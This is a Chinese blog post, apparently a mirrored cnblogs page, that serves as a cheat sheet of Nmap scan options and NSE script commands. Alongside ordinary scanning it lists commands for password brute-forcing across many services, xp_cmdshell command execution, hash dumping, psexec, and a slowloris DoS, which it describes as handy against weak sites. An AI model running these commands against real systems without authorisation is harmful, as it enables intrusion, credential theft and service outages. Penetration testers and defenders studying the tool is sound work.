zoukankan      html  css  js  c++  java
  • Nmap

    逼格高实用性强的神器Nmap的常用命令参数总结。

    nmap -sTV -p- -PN 192.168.1.101[-110]    TCP扫描,跳过主机发现扫描所有端口

    -s   

        T    扫描开放的TCP端口(TCP connect方式,之后Reset掉)

        S    扫描开放的TCP端口(TCP SYN方式,nmap的默认扫描模式,完成TCP的3次握手的前两步就RST掉,好处是很少有系统把这记入系统日志,Linux下需要root权限)

        A    扫描开放的TCP端口(TCP ACK方式,可用来探测是否有防火墙或IPS,且不会被记录)

        U    扫描开放的UDP端口,如果没有接收到端口不可达的ICMP reply,则认为是open|filtered

        V    服务、版本探测,V可加在以上各个s参数后,如-sTV

        P    扫描网段内存活主机(ICMP方式),192.168.1.*

    -O    用来识别操作系统

    -A    综合扫描,-sTV + traceroute + –O

    -p-    扫描所有端口,而不是默认的常用端口

    -p0-65535    指定扫描端口

    -PN    跳过主机发现阶段

    -iL    指定提供IP地址的文件

    -n    不进行逆向DNS解析

    -T    0~5,0表示最慢的扫描速度,而5表示最快。当为了避免被检测到而需要降低扫描速度,扫描速度越快结果越不准确

    -scan_delay 5ms    设置探测时间间隔(对于对提交处理能力差的目标主机应用)

    --host-timeout 5m    设置超时时间,防止扫描过慢

    nmap -sX 192.168.1.101[-110]    Xmas Tree扫描

    nmap -sN 192.168.1.101[-110]    Null扫描

    TCP的RFC文档建议,如果一个关闭的端口收到的数据包没有置位SYN、ACK或RST标记,该端口就会发送RST数据包作为响应。此外,如果开启的端口接收的数据包中没有将SYN、ACK或RST标志置位,那么该端口会忽略这些数据包。

    由Xmas Tree扫描创建的数据包的FIN、PSH和URG标记置为“on”。

    Null扫描使用没有任何标记(全空)的数据包。

    Xmas Tree扫描和Null扫描的好处是:某些情况下它们可以绕过简单的过滤器和ACL。一些低级的过滤器可以阻止SYN数据包的入侵。这种类型过滤器的目的就是阻止SYN数据包进入到系统中,进而阻止三次握手的完成。如果没有完成三次握手,系统之间就不会有TCP的信息流,外部的TCP信息流都被过滤掉了。

    Xmas Tree扫描和Null扫描都不会建立任何类型的通信通道。扫描的目标就是判断目标计算机的端口是开放的还是关闭的。

    Xmas Tree扫描和Null扫描针对的是 运行UNIX和Linux操作系统 并完全遵循RFC文档建议 的计算机。

    ----------------------------------------------------------------------------------------

    收集一些实例,暂时还没怎么用到,留待以后研究:

    nmap -d -sC 192.168.137.2   -d或者-d2参数开启debug模式,详细看整个扫描过程

    nmap -sL 192.168.137.*    仅列出指定网络上的每台主机,不发送任何报文到目标主机

    脚本:

    nmap --script=auth 192.168.137.*  负责处理鉴权证书(绕开鉴权)的脚本,可以作为检测一下弱口令用
    nmap -sC 192.168.137.*   或者nmap --script=default 192.168.137.*  默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

    nmap --script=brute 192.168.137.*   提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

    nmap --script=vuln 192.168.137.*    检查是否存在常见漏洞

    nmap -n -p445 --script=broadcast 192.168.137.4  在局域网内探查更多服务开启状况

    nmap --script=mysql-* 192.168.137.4  支持同一应用的所有脚本扫描

    nmap --script external 202.103.243.110 利用第三方的数据库或资源,例如进行whois解析

    vnc扫描:
    nmap  --script=realvnc-auth-bypass 192.168.137.4  检查vnc bypass
    nmap  --script=vnc-auth  192.168.137.4     检查认证类型  01就是不用密码认证 02是需要密码才能登陆
    nmap  --script=vnc-info  192.168.137.4

    smb扫描:
    nmap  --script=smb-brute.nse 192.168.137.4   smb破解
    nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4   smb字典破解
    nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4    smb已知几个严重漏洞的扫描
    nmap -p 445 -n --script smb-psexec --script-args smbuser=test,smbpass=test 192.168.137.4   查询主机一些敏感信息    注:需要下载nmap_service
    nmap -p 445  --script smb-ls --script-args 'share=e$,path=\,smbuser=test,smbpass=test' 192.168.137.4  查看共享目录
    nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4  查看会话
    nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4   系统信息


    mssql:
    nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa 192.168.137.4    列出表名
    nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4  xp_cmdshell执行命令
    nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4    dumphash
    nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4    猜解密码

    mysql:
    nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4   扫描root空口令
    nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4  列出所有mysql用户
    nmap --script=mysql-* 192.168.137.4  支持同一应用的所有脚本扫描
     

    oracle:
    nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5  oracle弱口令破解
    nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5   oracle sid扫描

    其他:
    nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关
    nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync
    nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解
    nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解
    nmap -sU --script snmp-brute 192.168.137.4            snmp破解
    nmap -sV --script=telnet-brute 192.168.137.4          telnet破解
    nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn
    nmap --script=http-methods.nse 192.168.137.4 检查http方法
    nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections
    nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

    不靠谱的脚本:
    vnc-brute    次数多了会禁止连接
    pcanywhere-brute   次数多了会禁止连接

  • 相关阅读:
    蓄水池抽样(Reservoir Sampling )
    动态申请一个二维数组
    最大子段和问题分析和总结
    正则表达式语法
    正则表达式介绍
    小刘同学的第七十六篇博文
    小刘同学的第七十五篇博文
    小刘同学的第七十四篇博文
    小刘同学的第七十三篇博文
    小刘同学的第七十二篇博文
  • 原文地址:https://www.cnblogs.com/btlulu/p/4025454.html
Copyright © 2011-2022 走看看